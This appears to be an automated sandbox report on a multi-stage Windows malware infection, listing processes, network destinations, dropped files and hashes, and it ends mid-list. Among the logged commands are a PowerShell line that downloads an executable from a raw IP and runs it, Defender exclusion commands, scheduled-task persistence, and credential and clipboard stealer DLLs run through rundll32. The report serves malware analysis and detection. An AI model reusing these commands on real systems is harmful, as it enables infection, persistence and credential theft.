PID 3016 wrote to memory of 1572 N/A C:\Users\Admin\AppData\Local\6262c901-c6a9-4476-b8cf-facfe93055a3\build2.exe C:\Windows\SysWOW64\WerFault.exe
PID 3016 wrote to memory of 1572 N/A C:\Users\Admin\AppData\Local\6262c901-c6a9-4476-b8cf-facfe93055a3\build2.exe C:\Windows\SysWOW64\WerFault.exe
PID 3016 wrote to memory of 1572 N/A C:\Users\Admin\AppData\Local\6262c901-c6a9-4476-b8cf-facfe93055a3\build2.exe C:\Windows\SysWOW64\WerFault.exe
PID 3016 wrote to memory of 1572 N/A C:\Users\Admin\AppData\Local\6262c901-c6a9-4476-b8cf-facfe93055a3\build2.exe C:\Windows\SysWOW64\WerFault.exe
PID 1820 wrote to memory of 2980 N/A C:\Users\Admin\AppData\Local\Temp\6375.exe C:\Users\Admin\AppData\Local\6262c901-c6a9-4476-b8cf-facfe93055a3\build3.exe
PID 1820 wrote to memory of 2980 N/A C:\Users\Admin\AppData\Local\Temp\6375.exe C:\Users\Admin\AppData\Local\6262c901-c6a9-4476-b8cf-facfe93055a3\build3.exe
PID 1820 wrote to memory of 2980 N/A C:\Users\Admin\AppData\Local\Temp\6375.exe C:\Users\Admin\AppData\Local\6262c901-c6a9-4476-b8cf-facfe93055a3\build3.exe
PID 1820 wrote to memory of 2980 N/A C:\Users\Admin\AppData\Local\Temp\6375.exe C:\Users\Admin\AppData\Local\6262c901-c6a9-4476-b8cf-facfe93055a3\build3.exe
PID 2980 wrote to memory of 2524 N/A C:\Users\Admin\AppData\Local\6262c901-c6a9-4476-b8cf-facfe93055a3\build3.exe C:\Users\Admin\AppData\Local\6262c901-c6a9-4476-b8cf-facfe93055a3\build3.exe

Uses Task Scheduler COM API

persistence

Processes

C:\Users\Admin\AppData\Local\Temp\8ed92a1964a27552705926c929118b576553585874cc19aa4214ee7e810d3b5d.exe

"C:\Users\Admin\AppData\Local\Temp\8ed92a1964a27552705926c929118b576553585874cc19aa4214ee7e810d3b5d.exe"

C:\Windows\system32\cmd.exe

cmd /c ""C:\Users\Admin\AppData\Local\Temp\BCBA.bat" "

C:\Windows\system32\reg.exe

reg add "HKEY_CURRENT_USER\Software\clicker\key" /v primary /t REG_DWORD /d 1

C:\Users\Admin\AppData\Local\Temp\6375.exe

C:\Users\Admin\AppData\Local\Temp\6375.exe

C:\Users\Admin\AppData\Local\Temp\6375.exe

C:\Users\Admin\AppData\Local\Temp\6375.exe

C:\Windows\SysWOW64\icacls.exe

icacls "C:\Users\Admin\AppData\Local\f6994695-3cd8-4f33-87d3-a992b1783b4e" /deny *S-1-1-0:(OI)(CI)(DE,DC)

C:\Users\Admin\AppData\Local\Temp\6375.exe

"C:\Users\Admin\AppData\Local\Temp\6375.exe" --Admin IsNotAutoStart IsNotTask

C:\Users\Admin\AppData\Local\Temp\6375.exe

"C:\Users\Admin\AppData\Local\Temp\6375.exe" --Admin IsNotAutoStart IsNotTask

C:\Users\Admin\AppData\Local\6262c901-c6a9-4476-b8cf-facfe93055a3\build2.exe

"C:\Users\Admin\AppData\Local\6262c901-c6a9-4476-b8cf-facfe93055a3\build2.exe"

C:\Users\Admin\AppData\Local\6262c901-c6a9-4476-b8cf-facfe93055a3\build2.exe

"C:\Users\Admin\AppData\Local\6262c901-c6a9-4476-b8cf-facfe93055a3\build2.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 3016 -s 1444

C:\Users\Admin\AppData\Local\6262c901-c6a9-4476-b8cf-facfe93055a3\build3.exe

"C:\Users\Admin\AppData\Local\6262c901-c6a9-4476-b8cf-facfe93055a3\build3.exe"

C:\Users\Admin\AppData\Local\6262c901-c6a9-4476-b8cf-facfe93055a3\build3.exe

"C:\Users\Admin\AppData\Local\6262c901-c6a9-4476-b8cf-facfe93055a3\build3.exe"

C:\Windows\SysWOW64\schtasks.exe

/C /create /F /sc minute /mo 1 /tn "Azure-Update-Task" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe"

C:\Users\Admin\AppData\Local\Temp\D55B.exe

C:\Users\Admin\AppData\Local\Temp\D55B.exe

C:\Windows\system32\cmd.exe

cmd /c ""C:\Users\Admin\AppData\Local\Temp\D80A.bat" "

C:\Windows\system32\reg.exe

reg add "HKEY_CURRENT_USER\Software\clicker\key" /v primary /t REG_DWORD /d 1

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2868 -s 124

C:\Users\Admin\AppData\Local\Temp\F31A.exe

C:\Users\Admin\AppData\Local\Temp\F31A.exe

C:\Windows\system32\taskeng.exe

taskeng.exe {E17D5ECB-3BDA-44A1-9410-37913DE0A1EC} S-1-5-21-1650401615-1019878084-3673944445-1000:UADPPTXT\Admin:Interactive:[1]

C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe

C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe

C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe

C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe

C:\Windows\SysWOW64\schtasks.exe

/C /create /F /sc minute /mo 1 /tn "Azure-Update-Task" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe"

C:\Users\Admin\AppData\Local\Temp\3F18.exe

C:\Users\Admin\AppData\Local\Temp\3F18.exe

C:\Users\Admin\AppData\Local\Temp\463A.exe

C:\Users\Admin\AppData\Local\Temp\463A.exe

C:\Users\Admin\AppData\Local\Temp\4D8B.exe

C:\Users\Admin\AppData\Local\Temp\4D8B.exe

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"powershell" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"powershell" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData"

C:\Users\Admin\AppData\Local\Temp\154561dcbf\Dctooux.exe

"C:\Users\Admin\AppData\Local\Temp\154561dcbf\Dctooux.exe"

C:\Windows\SysWOW64\rundll32.exe

"C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Local\Temp\1000005011\blyat.dll, Main

C:\Users\Admin\AppData\Local\Temp\154561dcbf\Dctooux.exe

"C:\Users\Admin\AppData\Local\Temp\154561dcbf\Dctooux.exe"

C:\Windows\SysWOW64\rundll32.exe

"C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\810b84e2bfa3a9\cred64.dll, Main

C:\Windows\system32\rundll32.exe

"C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\810b84e2bfa3a9\cred64.dll, Main

C:\Windows\system32\netsh.exe

netsh wlan show profiles

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command Compress-Archive -Path 'C:\Users\Admin\AppData\Local\Temp\_Files_\' -DestinationPath 'C:\Users\Admin\AppData\Local\Temp\650401615101_Desktop.zip' -CompressionLevel Optimal

C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe

C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe

C:\Windows\SysWOW64\rundll32.exe

"C:\Windows\SysWOW64\rundll32.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2156 -s 208

C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe

C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe

C:\Windows\SysWOW64\rundll32.exe

"C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\810b84e2bfa3a9\clip64.dll, Main

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command "Invoke-WebRequest -Uri 'http://193.222.96.225/server/website2014523652458952/blue/Gcode_Secure/Gcode.exe' -OutFile 'C:\Users\Admin\AppData\Roaming\WmiPrvSE.exe'; Start-Process 'C:\Users\Admin\AppData\Roaming\WmiPrvSE.exe'"

C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe

C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe

C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe

C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe

C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe

C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe

C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe

C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe

Network

Country Destination Domain Proto
US 8.8.8.8:53 trad-einmyus.com udp
RU 81.94.159.197:80 trad-einmyus.com tcp
US 8.8.8.8:53 sdfjhuz.com udp
MX 187.211.202.16:80 sdfjhuz.com tcp
RU 81.94.159.197:80 trad-einmyus.com tcp
US 8.8.8.8:53 sportessentia.home.pl udp
PL 79.96.138.166:443 sportessentia.home.pl tcp
PL 79.96.138.166:443 sportessentia.home.pl tcp
US 8.8.8.8:53 m2reg.ulm.ac.id udp
ID 103.23.232.80:80 m2reg.ulm.ac.id tcp
US 8.8.8.8:53 api.2ip.ua udp
US 104.21.65.24:443 api.2ip.ua tcp
US 104.21.65.24:443 api.2ip.ua tcp
MX 187.211.202.16:80 sdfjhuz.com tcp
US 8.8.8.8:53 sajdfue.com udp
MX 187.211.202.16:80 sajdfue.com tcp
MX 187.211.202.16:80 sajdfue.com tcp
US 8.8.8.8:53 steamcommunity.com udp
GB 23.214.154.77:443 steamcommunity.com tcp
DE 5.75.208.156:80 5.75.208.156 tcp
US 8.8.8.8:53 valowaves.com udp
US 172.67.192.62:443 valowaves.com tcp
US 8.8.8.8:53 nessotechbd.com udp
US 192.185.16.114:443 nessotechbd.com tcp
US 192.185.16.114:443 nessotechbd.com tcp
US 8.8.8.8:53 dham2fjg7wsuiqovkuaqkfc42rhfbctvzf4filsx5kq7iqvvd5n2tuad.onion.ly udp
US 209.141.39.59:443 dham2fjg7wsuiqovkuaqkfc42rhfbctvzf4filsx5kq7iqvvd5n2tuad.onion.ly tcp
US 8.8.8.8:53 drive.google.com udp
GB 172.217.169.78:443 drive.google.com tcp
NL 195.20.16.82:443 tcp
NL 195.20.16.82:443 tcp
US 8.8.8.8:53 lknusantararaya.com udp
ID 103.147.154.49:443 lknusantararaya.com tcp
ID 103.147.154.49:443 lknusantararaya.com tcp
US 8.8.8.8:53 streamingplay.site udp
BR 45.152.46.72:443 streamingplay.site tcp
BR 45.152.46.72:443 streamingplay.site tcp
US 8.8.8.8:53 www.upload.ee udp
FR 51.91.30.159:443 www.upload.ee tcp
US 8.8.8.8:53 github.com udp
DE 140.82.121.3:443 github.com tcp
DE 140.82.121.3:443 github.com tcp
RU 185.215.113.45:80 185.215.113.45 tcp
US 8.8.8.8:53 topgamecheats.dev udp
BG 93.123.39.96:443 topgamecheats.dev tcp
NL 193.222.96.225:80 193.222.96.225 tcp
BG 93.123.39.96:80 topgamecheats.dev tcp
BG 93.123.39.96:80 topgamecheats.dev tcp
BG 93.123.39.96:80 topgamecheats.dev tcp
BG 93.123.39.96:80 topgamecheats.dev tcp
BG 93.123.39.96:80 topgamecheats.dev tcp

Files

memory/2744-3-0x0000000000400000-0x0000000000474000-memory.dmp

memory/2744-2-0x00000000001B0000-0x00000000001BB000-memory.dmp

memory/2744-1-0x00000000002D0000-0x00000000003D0000-memory.dmp

memory/1216-4-0x0000000001C50000-0x0000000001C66000-memory.dmp

memory/2744-5-0x0000000000400000-0x0000000000474000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\BCBA.bat

MD5 55cc761bf3429324e5a0095cab002113
SHA1 2cc1ef4542a4e92d4158ab3978425d517fafd16d
SHA256 d6cceb3c71b80403364bf142f2fa4624ee0be36a49bac25ed45a497cf1ce9c3a
SHA512 33f9f5cad22d291077787c7df510806e4ac31f453d288712595af6debe579fabed6cdf4662e46e6fa94de135b161e739f55cfae05c36c87af85ed6a6ad1c9155

C:\Users\Admin\AppData\Local\Temp\6375.exe

MD5 ae597691370226cc4354b9897415b115
SHA1 3e89b4b1d81cdae205ac96f151bf3dc0fe3337ae
SHA256 10f5ba78f4d86b82127e167fee1ea0e6b26dd087ecfe933bda24e5d2685ad675
SHA512 f2db423695272ea3519d6329965baf4f0eee6dda62820406ecafcc13385380cb6279c097a8a610163835a181f845ccac7982c7f867b90abc5b553968b3ac7f24

memory/328-26-0x0000000000220000-0x00000000002B1000-memory.dmp

memory/328-27-0x0000000000220000-0x00000000002B1000-memory.dmp

memory/328-28-0x0000000001E30000-0x0000000001F4B000-memory.dmp

memory/2600-31-0x000000007EFDE000-0x000000007EFDF000-memory.dmp

memory/2600-33-0x0000000000400000-0x0000000000537000-memory.dmp

memory/2600-36-0x0000000000400000-0x0000000000537000-memory.dmp

memory/2600-37-0x0000000000400000-0x0000000000537000-memory.dmp

memory/2600-58-0x0000000000400000-0x0000000000537000-memory.dmp

memory/2392-61-0x0000000000570000-0x0000000000601000-memory.dmp

memory/2392-60-0x0000000000570000-0x0000000000601000-memory.dmp

memory/1820-68-0x0000000000400000-0x0000000000537000-memory.dmp

memory/1820-69-0x0000000000400000-0x0000000000537000-memory.dmp

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA

MD5 d67fa48cf6cf5f1818b732ea24db1d6e
SHA1 44858909775b98c384307149a53b231f084427f6
SHA256 1dd5acc0e95a7e0a6eea0ce7e4ab2665c928db84a241f4006a06791343b84d27
SHA512 c89132c4ac4a3e34e37ba33d98347af7c6a0394eceafb043cfd99e5d41d68575287cc537831a3f42924c975f7716aa0c531c6f619fac2df1c17daca658b926a6

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\CAF4703619713E3F18D8A9D5D88D6288_F2DAF19C1F776537105D08FC8D978464

MD5 8202a1cd02e7d69597995cabbe881a12
SHA1 8858d9d934b7aa9330ee73de6c476acf19929ff6
SHA256 58f381c3a0a0ace6321da22e40bd44a597bd98b9c9390ab9258426b5cf75a7a5
SHA512 97ba9fceab995d4bef706f8deef99e06862999734ebe6a05832c710104479c6337cbf0a76e1c1e0f91566a61334dc100d837dfd049e20da765fe49def684f9c9

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\CAF4703619713E3F18D8A9D5D88D6288_F2DAF19C1F776537105D08FC8D978464

MD5 fae824a47e25a52fa87a58ea307183f0
SHA1 167aee477372f3a380a69fc2654c64b1f5e0e5e2
SHA256 aaf7d93821170cf96ce48623dd8525d5698636dd2303f1cb8b07264c444af357
SHA512 0989dfa40b02e98470912b189992bfea43a1e6496e03c66944006c93f254f9afc3fa09c4b8555a29d590c00813bd3d9a35dc771a3cb0207bf6a00c2e9aed7345

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA

MD5 14df8e8d9da174089ed3ab7dcc22165c
SHA1 a83ae80f69a2b631992a3d3951e3fccc98f0af93
SHA256 58de7867dc0b8866736ee742b7337d70e06f19d9c8c951b600704af3abab48d4
SHA512 8b64e00979a0e71d1432a19cb091360db405bd7fff82c3f3f21bc3471f9983d251758e6bc1735a3bf408bb5d91a015f7b1907a8bd89e939e17fbd50c382117d4

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 3714cad04dd89864e16db8534df25e4c
SHA1 37ba08ecf1c02bf4104585ad6f2a7ca2e7f53aed
SHA256 2cc9d3a1b9cd79413a4b9698faa0d98032fe9a714ffed6888da320aba7a291c6
SHA512 f41edb81f27cbeb0abae0171d3bcc3335c802bf7bafaeb5477e215e4e0c400821a988746cbbc8501c41b4eb416ffeef32cdf66450b5c9e61eb8fcc44af4c62b7

C:\Users\Admin\AppData\Local\Temp\Cab8739.tmp

MD5 ac05d27423a85adc1622c714f2cb6184
SHA1 b0fe2b1abddb97837ea0195be70ab2ff14d43198
SHA256 c6456e12e5e53287a547af4103e0397cb9697e466cf75844312dc296d43d144d
SHA512 6d0ef9050e41fbae680e0e59dd0f90b6ac7fea5579ef5708b69d5da33a0ece7e8b16574b58b17b64a34cc34a4ffc22b4a62c1ece61f36c4a11a0665e0536b90d

memory/1820-82-0x0000000000400000-0x0000000000537000-memory.dmp

memory/1820-83-0x0000000000400000-0x0000000000537000-memory.dmp

memory/1820-87-0x0000000000400000-0x0000000000537000-memory.dmp

memory/1820-89-0x0000000000400000-0x0000000000537000-memory.dmp

memory/1820-90-0x0000000000400000-0x0000000000537000-memory.dmp

\Users\Admin\AppData\Local\6262c901-c6a9-4476-b8cf-facfe93055a3\build2.exe

MD5 47704f454af8641dac1af2e2768d7881
SHA1 e3341bfdec84f69684aecde18cab2864519c7728
SHA256 a6a9375dd6e3b285bc6d65536a151a47dd136aced8180492f5ed6a391edf0d64
SHA512 9aea598ee30342a88fedf5eca2b104e8c5587cd284bd43229581b04497c60e6a71e5392a171a5dfbe88a2e41269434922e21c3f7f9682e2ea10b27b104606b25

memory/3016-107-0x0000000000400000-0x0000000000644000-memory.dmp

memory/660-112-0x0000000000230000-0x0000000000261000-memory.dmp

memory/3016-111-0x0000000000400000-0x0000000000644000-memory.dmp

memory/660-110-0x0000000000896000-0x00000000008B2000-memory.dmp

memory/1820-103-0x0000000000400000-0x0000000000537000-memory.dmp

memory/3016-105-0x000000007EFDE000-0x000000007EFDF000-memory.dmp

memory/3016-113-0x0000000000400000-0x0000000000644000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\TarA22A.tmp

MD5 9c0c641c06238516f27941aa1166d427
SHA1 64cd549fb8cf014fcd9312aa7a5b023847b6c977
SHA256 4276af3669a141a59388bc56a87f6614d9a9bdddf560636c264219a7eb11256f
SHA512 936ed0c0b0a7ff8e606b1cc4175a1f9b3699748ccbba1c3aff96203033d2e9edabf090e5148370df42fbfc4e31d7229493706ff24f19ff42ff7bef74a6baad06

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\94308059B57B3142E455B38A6EB92015

MD5 753df6889fd7410a2e9fe333da83a429
SHA1 3c425f16e8267186061dd48ac1c77c122962456e
SHA256 b42dc237e44cbc9a43400e7d3f9cbd406dbdefd62bfe87328f8663897d69df78
SHA512 9d56f79410ad0cf852c74c3ef9454e7ae86e80bdd6ff67773994b48ccac71142bcf5c90635da6a056e1406e81e64674db9584928e867c55b77b59e2851cf6444

C:\Users\Admin\AppData\Local\Temp\TarA413.tmp

MD5 dd73cead4b93366cf3465c8cd32e2796
SHA1 74546226dfe9ceb8184651e920d1dbfb432b314e
SHA256 a6752b7851b591550e4625b832a393aabcc428de18d83e8593cd540f7d7cae22
SHA512 ce1bdd595065c94fa528badf4a6a8777893807d6789267612755df818ba6ffe55e4df429710aea29526ee4aa8ef20e25f2f05341da53992157d21ae032c0fb63

\Users\Admin\AppData\Local\6262c901-c6a9-4476-b8cf-facfe93055a3\build3.exe

MD5 41b883a061c95e9b9cb17d4ca50de770
SHA1 1daf96ec21d53d9a4699cea9b4db08cda6fbb5ad
SHA256 fef2c8ca07c500e416fd7700a381c39899ee26ce1119f62e7c65cf922ce8b408
SHA512 cdd1bb3a36182575cd715a52815765161eeaa3849e72c1c2a9a4e84cc43af9f8ec4997e642702bb3de41f162d2e8fd8717f6f8302bba5306821ee4d155626319

memory/1820-181-0x0000000000400000-0x0000000000537000-memory.dmp

memory/3016-183-0x0000000000400000-0x0000000000644000-memory.dmp

memory/2524-186-0x000000007EFDE000-0x000000007EFDF000-memory.dmp

memory/2980-188-0x0000000000980000-0x0000000000A80000-memory.dmp

memory/2524-189-0x0000000000400000-0x0000000000406000-memory.dmp

memory/2980-190-0x0000000000220000-0x0000000000224000-memory.dmp

memory/2524-193-0x0000000000400000-0x0000000000406000-memory.dmp

memory/2524-195-0x0000000000400000-0x0000000000406000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\D55B.exe

MD5 9e52aa572f0afc888c098db4c0f687ff
SHA1 ef7c2bb222e69ad0e10c8686eb03dcbee7933c2b
SHA256 4a40f9d491f09521f4b0c6076a0eb488f6d8e1cf4b67aa6569c2ccce13556443
SHA512 d0991e682ae8c954721e905753b56c01f91b85313beb9996331793c3efa8acc13d574ef5ba44853ecc3e05822931ed655bad1924fa11b774a43e015f42185f62

memory/2868-211-0x0000000000260000-0x0000000000F45000-memory.dmp

memory/2868-216-0x00000000000F0000-0x00000000000F1000-memory.dmp

memory/2868-219-0x00000000000F0000-0x00000000000F1000-memory.dmp

memory/2868-218-0x0000000000260000-0x0000000000F45000-memory.dmp

memory/2868-221-0x00000000000F0000-0x00000000000F1000-memory.dmp

memory/2868-222-0x0000000000100000-0x0000000000101000-memory.dmp

memory/2868-224-0x0000000000100000-0x0000000000101000-memory.dmp

memory/2868-226-0x0000000000100000-0x0000000000101000-memory.dmp

memory/2868-229-0x0000000000110000-0x0000000000111000-memory.dmp

memory/2868-231-0x0000000000110000-0x0000000000111000-memory.dmp

memory/2868-234-0x0000000000120000-0x0000000000121000-memory.dmp

memory/2868-236-0x0000000000120000-0x0000000000121000-memory.dmp

\Users\Admin\AppData\Local\Temp\D55B.exe

MD5 d93e4dc19c2cd25d6bfd3fff6f2b27af
SHA1 3dce53a7800b1e82b9f4f2f6011e94bddd5fc3cb
SHA256 40ce345534f5f07cd01d1a5612577f53a991d9d7bc76f7c0f44d53b08e59c51d
SHA512 a98024b3a381f11b40030509539211cf4bc8f9ab8ed6a368644e865bcccd8b498f53e6ba74a0db2c3d4b383aba9ddaee93be4efde0e22fa1c4a9c240712a2902

\Users\Admin\AppData\Local\Temp\D55B.exe

MD5 aa446655b3ddadb20daa89ed5306b3a2
SHA1 76b29972397c9e716108c530558326e0b18b38fb
SHA256 858c1b15c0e9ac57b343cd72bfc3592b3a5716fbc59ced1b3bca3455f1634c4d
SHA512 45e8be7eed7e8c535e92cebed7e09f1ecda7dc99d09bb22f9d3c600f68f86c6633c64c17920aee7a98813d544a60f4e614e70b054bc6ff1cd788a086f60f04e8

\Users\Admin\AppData\Local\Temp\D55B.exe

MD5 a4547c6ffa08aecc8b00ac617283e884
SHA1 199437df98dac1e64ac59caaa965616e0853a1b6
SHA256 2344b653d3577a1c78171c099aaa2505d23fb024d5b5af10c728c2402e02a592
SHA512 f09244a93ab44a2d7d2873d4815b5ebcc2e0eea7ba566c92b289c8720af7b9c038ef3808d6225cdbeaab8b1d305a6815f6b4fbab294a878d0c59ce02d4cab7e0

memory/2868-250-0x0000000000150000-0x0000000000151000-memory.dmp

\Users\Admin\AppData\Local\Temp\F31A.exe

MD5 a38d4abfcf2cc15bf220cc32fc21c448
SHA1 35b19554c2adb7caed0183e0fdefd1765a421e57
SHA256 5d36c7f8436f72c6d9e67b290c65b5d21ae4a5e30ff30143f5ac1742b7fafe05
SHA512 e578b32168fd153a703ded21197fbefdd8b4357c4c3978edf84738ffa928ad278421fd7ea2feb2a3cebf13261b5a2bffcca95594a34f1fb52d3490138afc36fb

C:\Users\Admin\AppData\Local\Temp\F31A.exe

MD5 739a567bcbb5d444c31fc45e80c2ffad
SHA1 353b43fb544edc32af852a3c9ab560ba90ddc05e
SHA256 ee9edc2473cee323a9cb867d196fc53d8049d21e357d316f8cb7a43c02f36993
SHA512 2908f1429b596a1fa71fc7b47600cf54212fa622dc82eb019c45cdf638453a968c36b9abf22609303693c6dd03e482758e177dc58211dc1f6c179e00d4eb0f38

memory/1032-264-0x00000000009B0000-0x0000000000AB0000-memory.dmp

memory/2980-262-0x0000000000220000-0x0000000000224000-memory.dmp

memory/2868-272-0x0000000000260000-0x0000000000F45000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\3F18.exe

MD5 f0c94dddfe48fc59e16292085f2a1dec
SHA1 53d5fc078a95d82f980ceda525b9e1bfa84cc0a2
SHA256 144533d2a305451c2c3c60ecd273f5745c8949d3aa55a26655e7a696528202ba
SHA512 6b86919e458fd33b9903c5c6c65d52df068cade688d9bb393a432cc14e5b063e87aa2c1e9655bcae4cd312fb1d323da116b75357527fe53a064b487a1d94b20b

C:\Users\Admin\AppData\Local\Temp\3F18.exe

MD5 f7ca612af421d5246bff466f9f646b2c
SHA1 7ceed481d264879f5f54bc5b048c31d76aa4879a
SHA256 a1e2c4eee561c36d64b88d9f25914e0af39a2265cb69a1b4d572fe38cb5ffcfd
SHA512 e1e529293d4bd96e630edde518d9f1e383983c7b8f4509219363142e2530b1dfd275a6ffccda6a298cd1817d663a7959a1d085fe8fc677d7a22b639dca0286d0

memory/1524-281-0x0000000001280000-0x0000000001722000-memory.dmp

memory/1524-282-0x0000000077670000-0x0000000077672000-memory.dmp

memory/1524-285-0x0000000000A50000-0x0000000000A51000-memory.dmp

memory/1524-286-0x0000000000CD0000-0x0000000000CD1000-memory.dmp

memory/1524-284-0x0000000000C50000-0x0000000000C51000-memory.dmp

memory/1524-283-0x0000000000BF0000-0x0000000000BF2000-memory.dmp

memory/1524-288-0x0000000000A00000-0x0000000000A01000-memory.dmp

memory/1524-287-0x0000000000990000-0x0000000000991000-memory.dmp

memory/1524-290-0x0000000000CC0000-0x0000000000CC1000-memory.dmp

memory/1524-289-0x0000000000A60000-0x0000000000A61000-memory.dmp

memory/1524-291-0x0000000000940000-0x0000000000941000-memory.dmp

memory/1524-292-0x00000000009A0000-0x00000000009A1000-memory.dmp

memory/1524-293-0x0000000001280000-0x0000000001722000-memory.dmp

memory/1524-294-0x00000000008D0000-0x00000000008D1000-memory.dmp

memory/1524-296-0x00000000009F0000-0x00000000009F1000-memory.dmp

memory/1524-297-0x0000000000DE0000-0x0000000000DE1000-memory.dmp

memory/1524-298-0x00000000008E0000-0x00000000008E1000-memory.dmp

memory/1524-299-0x0000000001270000-0x0000000001271000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\463A.exe

MD5 0de19cd17462ea79db1a5e5fd1d7f59f
SHA1 d2b313dcfbda9a04475fc01182336b52846bbe3b
SHA256 c7a85c09379538ca0f5e856eb5dcf63d949c9d1841e12cb8c5fd42c780f1fe3b
SHA512 0aecaaa2d8488c3150b2349c260782c13619c5b871f7559496da8fa53e8a18a3fff39603d65516f53709c95108672fd08da8a1249b58aaba92c19ad80411d40c

C:\Users\Admin\AppData\Local\Temp\3F18.exe

MD5 22b21bd1bb31df3cb3a23895d72d3cca
SHA1 dd60134aa21c226e52fa6bad9965ec47369e013a
SHA256 9e7f9056ed055f0163d75e314faaaba40d5e7fd4e02c9b40c150420d5a432f69
SHA512 38a4bf25f59c553794a863e6e540a33b921c380459cf8ee4586c21589c7ffbe7ff36d3c6875703d6777a3de43970557928bde90c3f7125eb66eea73cdd24b9d7

memory/1524-311-0x0000000001280000-0x0000000001722000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\4D8B.exe

MD5 f727c0754ddda4ed6354375ab748735b
SHA1 2ad7d52a12f896817edfe511ec26212580dc5958
SHA256 661a2b6049a9d139ab8ae094b25ea0cfd3f24e7aa18190ae11e23f9e97753899
SHA512 1193780f969653123b41f41f9f6aeb1b71752d80337fd01928dfcee4e370b49fc24da0bfab6bcfb710019301bea3800db90250b46bfae4a45e2ad6a6d73a5ce3

memory/2108-318-0x0000000000830000-0x00000000008CA000-memory.dmp

memory/2108-319-0x0000000072F40000-0x000000007362E000-memory.dmp

memory/340-324-0x0000000000400000-0x00000000004AB000-memory.dmp

memory/340-323-0x0000000000220000-0x000000000028F000-memory.dmp

memory/340-322-0x0000000000910000-0x0000000000A10000-memory.dmp

memory/2108-325-0x0000000009590000-0x00000000095D0000-memory.dmp

memory/2160-333-0x000000006F9B0000-0x000000006FF5B000-memory.dmp

memory/2936-332-0x000000006F9B0000-0x000000006FF5B000-memory.dmp

memory/2160-331-0x000000006F9B0000-0x000000006FF5B000-memory.dmp

memory/2160-334-0x0000000001DE0000-0x0000000001E20000-memory.dmp

memory/2936-335-0x0000000002280000-0x00000000022C0000-memory.dmp

memory/2936-337-0x0000000002280000-0x00000000022C0000-memory.dmp

memory/2936-338-0x000000006F9B0000-0x000000006FF5B000-memory.dmp

memory/340-339-0x00000000008E0000-0x00000000008E1000-memory.dmp

memory/340-353-0x0000000000910000-0x0000000000A10000-memory.dmp

memory/340-354-0x0000000000400000-0x00000000004AB000-memory.dmp

memory/2160-356-0x000000006F9B0000-0x000000006FF5B000-memory.dmp

memory/2936-355-0x000000006F9B0000-0x000000006FF5B000-memory.dmp

memory/1828-360-0x0000000000680000-0x0000000000780000-memory.dmp

memory/1828-361-0x0000000000400000-0x00000000004AB000-memory.dmp

memory/2108-371-0x0000000072F40000-0x000000007362E000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\650401615101

MD5 29d3383c235bc3061c5b17767ca03ca7
SHA1 c67b916e63fb47d59b6e278582a2c7e4c095ebcf
SHA256 402521c872f6fd098b481ce293ccc5f4efeb2d6357c7e11be5857934e96883cc
SHA512 3d83969eae3b149011b62469db0da7c2978d03521605d4c3ed5544ad006e87da5c7d295b95258aa82e7b0707457f1e734d9c3f4c4f57705b5762ddcdc3b5ba54

C:\Users\Admin\AppData\Local\Temp\1000005011\blyat.dll

MD5 cb253bf8a6859eadd30b4ceb66c6a588
SHA1 7e9383d51ec36a019b5884f79a2ac2c05b4049bd
SHA256 03d2efb0706bab18e7b594b985f20bd316d9e074dc3906ebefe7ab4baffe5722
SHA512 1291d53ee1e025889a6d2bb222eac940c4ba73ae22fd956cbc8c9e61fcc0f78c96a5277362750a5e168ab5a02b46d5d11defaca0956eae08ad546ec529a3e061

C:\Users\Admin\AppData\Local\Temp\1000005011\blyat.dll

